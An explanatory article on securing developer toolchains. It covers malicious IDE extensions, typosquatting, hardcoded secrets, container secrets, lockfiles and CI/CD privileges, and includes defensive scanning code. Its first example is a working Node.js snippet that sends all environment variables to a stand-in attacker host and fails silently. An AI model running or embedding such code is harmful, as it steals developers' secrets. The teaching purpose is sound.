The Double-Edged Sword: Balancing Productivity and Security in Modern Development

In today’s fast-paced software development landscape, developer tools are the bedrock of productivity. From IDEs like Visual Studio Code and JetBrains Rider to extensions, package managers, and CI/CD pipelines, these tools let developers build, test, and deploy applications quickly. They are indispensable for everything from JavaScript and Python development to debugging complex microservices. However, reliance on an ever-expanding toolchain also creates a subtle but significant attack surface. The very tools we trust to streamline our work can become vectors for attacks that steal sensitive data, inject malware, and disrupt the software supply chain. Understanding these risks is no longer optional; it is a core part of modern application security.

This article delves into the often-overlooked security implications of our daily developer tools. We will explore how these essential utilities can be compromised, examine the mechanics behind common attacks, and provide a comprehensive guide with practical code examples and best practices to help you secure your development environment. By shifting our perspective from viewing tools as mere productivity enhancers to critical infrastructure requiring diligent security, we can build more resilient and secure software from the ground up.

How Trusted Tools Become Attack Vectors

The convenience of modern developer tools often masks their underlying complexity and the vulnerabilities they can introduce. An attack doesn’t have to target a production server directly; compromising a developer’s environment can be an equally effective entry point, if not a more effective one. Let’s break down the primary ways these tools can be exploited.

Malicious IDE Extensions and Plugins

The extension marketplace for IDEs like VS Code is a treasure trove of utilities, from linters and themes to advanced debugging tools. However, the open nature of these marketplaces means that malicious actors can publish seemingly harmless extensions that carry hidden payloads. Once installed, an extension typically runs with the same privileges as the editor itself, which gives it access to your source code, environment variables, and network connections.

Consider a hypothetical malicious extension designed to steal API keys from a Node.js project. The code could be obfuscated, but its core function might look something like this:

    // Malicious code hidden within an "innocent" theme or utility extension
    const https = require('https');
    const os = require('os');

    function exfiltrateData() {
      // Access environment variables, a common place for secrets
      const envData = JSON.stringify(process.env);

      // Also, search common config files for credentials
      // (This part is omitted for brevity but is a common technique)

      const postData = JSON.stringify({
        username: os.userInfo().username,
        hostname: os.hostname(),
        env: envData,
      });

      const options = {
        hostname: 'attacker-controlled-server.com',
        port: 443,
        path: '/data-capture',
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
          'Content-Length': Buffer.byteLength(postData),
        },
      };

      const req = https.request(options, (res) => {
        // We don't care about the response, just that the data was sent
        console.log(`[Malicious Extension] Status: ${res.statusCode}`);
      });

      req.on('error', (e) => {
        // Fail silently to avoid detection
      });

      req.write(postData);
      req.end();
    }

    // Run this function when the extension is activated
    exfiltrateData();

This snippet gathers all environment variables—which often contain sensitive keys like `AWS_SECRET_ACCESS_KEY` or `DATABASE_URL`—and sends them to an attacker’s server. Because it runs within the trusted context of your IDE, it bypasses many traditional security measures. This highlights the importance of vetting every tool added to your workflow, no matter how trivial it seems.
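
Part of that vetting can be automated as a first pass. The Python sketch below assumes the extension's JavaScript has been unpacked to a local folder; the two regular expressions and the function names are illustrative choices, not an established detection rule. It flags files that both read `process.env` and make a network call, which is the combination the snippet above relies on.

```python
import re
from pathlib import Path

# Hypothetical heuristics: each pattern is harmless alone, but the
# combination is worth a manual look in an extension's source.
ENV_ACCESS = re.compile(r"process\.env\b")
NETWORK_CALL = re.compile(r"\b(?:https?\.request|fetch|XMLHttpRequest)\b")


def is_suspicious(source: str) -> bool:
    """Return True if the text both reads the environment and makes a network call."""
    return bool(ENV_ACCESS.search(source)) and bool(NETWORK_CALL.search(source))


def scan_extension(root: Path) -> list[Path]:
    """List JavaScript files under `root` that match both heuristics."""
    flagged = []
    for path in sorted(root.rglob("*.js")):
        text = path.read_text(encoding="utf-8", errors="ignore")
        if is_suspicious(text):
            flagged.append(path)
    return flagged
```

A check like this is easy to evade with obfuscation and will also flag legitimate extensions, so treat a hit as a prompt for manual review rather than a verdict.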

Compromised Dependencies and Typosquatting

Package managers like npm, PyPI, and Maven are central to modern development, but they represent a massive supply chain risk. Attackers use several techniques to inject malicious code through dependencies:

- Typosquatting: Publishing a malicious package with a name very similar to a popular one (e.g., `reqeusts` or `python-requests` instead of `requests`). A simple typo or a wrong guess at the name during installation can compromise a project.

- Dependency Confusion: Tricking a build process into pulling a malicious package from a public repository instead of the intended private one by using the same name with a higher version number.

- Maintainer Account Takeover: Gaining control of a legitimate, popular package and publishing a new version with a malicious payload.

Testing and debugging alone rarely catch these issues, because the malicious code is designed to be stealthy. The risk hides in the dependencies listed in your `package.json` or `requirements.txt` file, including the transitive ones those files never name.
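
Typosquatting in particular lends itself to a simple pre-install check. The following Python sketch compares a requested package name against an allowlist using the standard library's `difflib`; the allowlist contents, the `0.8` cutoff, and the function name are assumptions made for illustration.

```python
import difflib

# Hypothetical allowlist; in practice this would be the packages your team has approved.
KNOWN_PACKAGES = ["requests", "numpy", "flask", "django", "psycopg2"]


def possible_typosquat(name: str, known=KNOWN_PACKAGES, cutoff: float = 0.8):
    """Return the known package that `name` closely resembles, or None.

    An exact match is treated as legitimate and returns None.
    """
    normalized = name.lower()
    if normalized in known:
        return None
    matches = difflib.get_close_matches(normalized, known, n=1, cutoff=cutoff)
    return matches[0] if matches else None
```

Similarity scoring of this kind catches transposed or dropped letters. Names that add a prefix or suffix to a real package may score below the cutoff and would need a separate rule.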

Implementing a Proactive Defense Strategy

Securing your development environment requires a proactive, multi-layered approach. It’s not just about fixing vulnerabilities after the fact; it’s about preventing them and hardening the entire lifecycle. This involves a combination of automated tools and vigilant developer practices across both frontend and backend work.

Automated Code and Dependency Scanning

Integrating Static Application Security Testing (SAST) and Software Composition Analysis (SCA) tools into your workflow is essential. SAST tools analyze your own source code for insecure patterns without executing the application, while SCA tools check your dependencies against databases of known vulnerabilities.

- Snyk: Scans dependencies for known vulnerabilities and offers automated pull requests to fix them. It integrates directly into your Git repository and CI/CD pipeline.

- SonarQube: A code analysis platform that detects bugs, code smells, and security vulnerabilities in your codebase.

- GitHub Dependabot: Automatically detects vulnerable dependencies in your repositories and opens pull requests to update them.



For example, a SAST tool would immediately flag hardcoded credentials in a Python application, which is a common source of security breaches. Consider this insecure Flask snippet:

    from flask import Flask
    import psycopg2

    app = Flask(__name__)

    # This is a major security vulnerability that SAST tools will detect.
    DB_PASSWORD = "my-super-secret-password-123"

    @app.route('/')
    def get_users():
        conn = psycopg2.connect(
            dbname="postgres",
            user="admin",
            password=DB_PASSWORD,  # Hardcoded secret
            host="db.example.com"
        )
        # ... database logic here ...
        return "Users list"

    if __name__ == '__main__':
        app.run()

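An automated scanner would flag the `DB_PASSWORD` assignment as a hardcoded secret, so it can be removed before the code is merged or deployed. A secret that has already been committed remains in version control history and should be rotated. Automated checks like this are crucial for maintaining a secure codebase.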
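
To make the idea concrete, here is a deliberately simplified Python sketch of the kind of rule such a scanner might apply. The regular expression and the function name are illustrative assumptions; real SAST tools use far richer rule sets and are not implemented this way.

```python
import re

# Simplified illustrative rule: an assignment whose name hints at a secret
# and whose value is a non-empty string literal.
SECRET_ASSIGNMENT = re.compile(
    r"""^\s*(?P<name>\w*(?:PASSWORD|SECRET|TOKEN|API_KEY)\w*)\s*=\s*(['"])(?P<value>.+?)\2""",
    re.IGNORECASE,
)


def find_hardcoded_secrets(source: str) -> list[tuple[int, str]]:
    """Return (line_number, variable_name) for each suspicious assignment."""
    findings = []
    for number, line in enumerate(source.splitlines(), start=1):
        match = SECRET_ASSIGNMENT.match(line)
        if match:
            findings.append((number, match.group("name")))
    return findings
```

Run against the Flask snippet above, a rule like this would report the `DB_PASSWORD` line, while an assignment that reads the value from the environment would pass because its right-hand side is not a string literal.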

Isolating Development Environments with Containers

Running projects directly on your host machine can lead to cross-contamination and gives potentially malicious code access to your entire system. Using containers (like Docker) or development containers (like VS Code Dev Containers) provides a powerful layer of isolation. Each project runs in its own sandboxed environment with only the necessary dependencies and permissions.

A common mistake when using Docker is embedding secrets directly into the image, which makes them visible to anyone who can inspect the image layers. This is a poor practice for both local development and CI/CD pipelines.

Bad Practice: Hardcoding secrets in a Dockerfile.

    FROM python:3.9-slim
    WORKDIR /app
    # Bad: The API key is now baked into the image layer
    ENV API_KEY="abcdef1234567890"
    COPY . .
    CMD ["python", "app.py"]

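Best Practice: Supplying secrets at runtime instead of baking them into the image. Build-time arguments are not a safe alternative, because values passed with `ARG` can be recovered from the image history.

    FROM python:3.9-slim
    WORKDIR /app
    # Good: The API key is passed at runtime and not stored in the image.
    # It will be provided via `docker run -e API_KEY="..."` or a similar mechanism.
    # The empty default only documents that the variable is expected.
    ENV API_KEY=""
    COPY . .
    CMD ["python", "app.py"]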

This approach keeps sensitive credentials out of the distributable artifact, which improves security both while debugging containers locally and in deployment.
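
On the application side, the runtime approach works best when the program fails fast if the secret is missing. The Python sketch below shows one way `app.py` might read `API_KEY`; the `load_secret` helper and the `MissingSecretError` class are hypothetical names introduced for this example.

```python
import os


class MissingSecretError(RuntimeError):
    """Raised when a required secret is absent from the environment."""


def load_secret(name: str, environ=None) -> str:
    """Return the secret `name` from the environment, failing fast if unset or empty."""
    env = os.environ if environ is None else environ
    value = env.get(name, "").strip()
    if not value:
        raise MissingSecretError(
            f"{name} is not set; pass it at runtime, e.g. docker run -e {name}"
        )
    return value
```

Calling `load_secret("API_KEY")` once at startup means a container launched without the variable stops immediately with a clear message, instead of running with an empty key.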

Advanced Techniques for Securing the Full Stack

As applications grow in complexity, so do the challenges of securing them. Securing and debugging a full stack requires a holistic view, from the frontend code running in the browser to the backend services running in a Kubernetes cluster.

Leveraging Lockfiles and Integrity Hashes

Never rely solely on a `package.json` or `requirements.txt` file for reproducible, secure builds. Always use a lockfile (`package-lock.json`, `yarn.lock`, `Pipfile.lock`). A lockfile pins the exact version of every direct and transitive dependency, along with a cryptographic hash of its contents. This prevents an attacker from publishing a malicious new version of a sub-dependency (a dependency of your dependency) and having it automatically pulled into your build. When installing from the lockfile (for example with `npm ci`), the package manager verifies each hash and fails on a mismatch. This blocks tampered or silently replaced artifacts, though it cannot help if the version you pinned was already malicious.
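
The hash check itself is straightforward. The Python sketch below verifies downloaded bytes against an integrity string of the form `<algorithm>-<base64 digest>`, which is the shape used by the `integrity` field in `package-lock.json`. The function names are illustrative, and this is not how any particular package manager is implemented.

```python
import base64
import hashlib
import hmac


def sri_digest(data: bytes, algorithm: str = "sha512") -> str:
    """Compute an integrity string of the form '<algorithm>-<base64 digest>'."""
    digest = hashlib.new(algorithm, data).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def verify_integrity(data: bytes, expected: str) -> bool:
    """Check downloaded bytes against a pinned integrity string."""
    algorithm, _, _ = expected.partition("-")
    if algorithm not in {"sha256", "sha384", "sha512"}:
        raise ValueError(f"unsupported algorithm: {algorithm!r}")
    return hmac.compare_digest(sri_digest(data, algorithm), expected)
```

Because the expected value is recorded when the dependency is first locked, any later change to the artifact's bytes produces a different digest and the comparison fails.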

Principle of Least Privilege in CI/CD

Your CI/CD pipeline is a high-value target for attackers. The credentials it uses often have broad permissions to deploy to production, access databases, and more. Apply the principle of least privilege rigorously:

- Scoped Tokens: Use access tokens that have the minimum required permissions for a specific job. For example, a testing job should not have credentials to deploy to production.

- Secrets Management: Integrate a dedicated secrets manager like HashiCorp Vault, AWS Secrets Manager, or GitHub Actions secrets. Avoid storing secrets as plain text environment variables in your CI/CD configuration.

- Container Security: Run CI/CD jobs in non-root containers to limit the potential damage if a job is compromised.
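
The scoped-token rule can be checked mechanically. In the Python sketch below, the job names, the scope strings, and the `excess_scopes` helper are all hypothetical; a real pipeline would take them from its own CI/CD provider's permission model.

```python
# Hypothetical job names and scope strings, purely for illustration.
REQUIRED_SCOPES = {
    "test": {"repo:read"},
    "deploy": {"repo:read", "deploy:production"},
}


def excess_scopes(job: str, granted: set[str]) -> set[str]:
    """Return scopes granted to `job` beyond what it needs."""
    return set(granted) - REQUIRED_SCOPES.get(job, set())
```

A non-empty result for the `test` job, for example one that includes `deploy:production`, is the situation the first bullet warns against.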

Remote Debugging and Production Security

Remote debugging is a powerful technique, but it can open security holes if not configured correctly. When attaching a debugger to a process running on a remote server or in a container, ensure the debugging port is not exposed to the public internet. Use SSH tunneling or a secure VPN to establish the connection. In production, rely on structured logging, distributed tracing (e.g., OpenTelemetry), and error monitoring platforms (e.g., Sentry, Datadog) instead of attaching live debuggers, which can halt processes and expose sensitive data such as variable values and stack traces.
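
One way to enforce the first point is to refuse to start a debug listener on anything but the loopback interface. The Python sketch below uses the standard `ipaddress` module; the `is_loopback_bind` helper is a hypothetical name for this example.

```python
import ipaddress


def is_loopback_bind(host: str) -> bool:
    """Return True if `host` restricts a listener to the local machine."""
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        # Hostnames other than "localhost" are treated as non-local here.
        return False
```

With the debugger bound to `127.0.0.1` on the remote machine, a tunnel such as `ssh -L 5678:127.0.0.1:5678 user@remote-host` forwards it to your workstation without opening the port publicly. The port number and host name here are placeholders.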

Best Practices for a Secure Development Lifecycle

Embedding security into your daily habits is the most effective way to protect your workflow. Here are actionable debugging and security practices to integrate into your routine.

Vigilance and Verification

- Vet Extensions: Before installing an IDE extension, check its publisher, number of downloads, reviews, and last update date. Look at its source code repository if available. Be wary of extensions that are new, have few users, or are forks of popular projects.

- Audit Dependencies: Regularly run audit commands like `npm audit` or `pip-audit` to check for known vulnerabilities in your project’s dependencies. `npm audit fix` can then apply compatible updates.

- Use Scoped Packages: For npm, prefer packages under an organization’s scope (e.g., `@angular/core` instead of a generic package) as they are less susceptible to typosquatting.

Configuration and Environment Hygiene

- Use a `.gitignore` file: Ensure that sensitive files like `.env`, IDE configuration folders (`.vscode/`, `.idea/`), and credential files are never committed to version control.

- Separate Concerns: Keep development, testing, and production apart. Don’t use a production cloud account or production credentials for development and testing. Isolated environments limit lateral movement if one of them is compromised.

- Keep Tools Updated: Regularly update your IDE, CLI tools, and operating system to patch known security vulnerabilities.
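
The `.gitignore` item is easy to verify in a pre-commit hook or CI step. The Python sketch below checks that a baseline set of patterns appears in the file; the baseline list and the function name are assumptions, and the check only does exact line matching.

```python
# Hypothetical baseline; adjust to the files your project actually uses.
REQUIRED_PATTERNS = [".env", ".vscode/", ".idea/"]


def missing_ignore_patterns(gitignore_text: str, required=REQUIRED_PATTERNS) -> list[str]:
    """Return required patterns that do not appear as a line in .gitignore."""
    present = set()
    for line in gitignore_text.splitlines():
        entry = line.strip()
        if entry and not entry.startswith("#"):
            present.add(entry)
    return [pattern for pattern in required if pattern not in present]
```

Because Git's matching rules include wildcards and negation, `git check-ignore <path>` remains the authoritative way to confirm that a specific file is ignored.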

Automate and Integrate

- Security in the Pipeline: Make SAST and SCA scans a mandatory step in your CI/CD pipeline. Fail the build if critical vulnerabilities are found.

- Policy as Code: Use tools like Open Policy Agent (OPA) to enforce security policies across your infrastructure, from Kubernetes configurations to API gateways.
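
The "fail the build" rule reduces to a small gate over scanner output. The Python sketch below assumes findings arrive as dictionaries with a `severity` key; that shape, the severity names, and the function name are illustrative and will differ between tools.

```python
# Severity names and their ordering are an assumption of this sketch.
SEVERITY_ORDER = ["low", "moderate", "high", "critical"]


def should_fail_build(findings: list[dict], threshold: str = "critical") -> bool:
    """Return True if any finding is at or above `threshold`."""
    limit = SEVERITY_ORDER.index(threshold)
    return any(SEVERITY_ORDER.index(f["severity"]) >= limit for f in findings)
```

A CI step could call this on parsed scan results and exit with a non-zero status when it returns `True`, which most pipelines treat as a failed job.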

Conclusion: Security as a Developer’s Responsibility

The modern developer’s toolkit is a powerful engine for innovation, but it comes with inherent security responsibilities. The line between a productivity tool and a security risk is dangerously thin and is defined by our awareness, practices, and vigilance. By treating our development environments with the same security rigor as our production servers, we can effectively mitigate a wide range of threats. This involves a fundamental shift from reactive bug fixing to proactive risk management.

The key takeaways are clear: vet every tool, automate security scanning, isolate your environments, and manage secrets diligently. By adopting a security-first mindset and integrating these best practices into your daily workflow, you can harness the full power of your developer tools while building a more secure and resilient software ecosystem for everyone.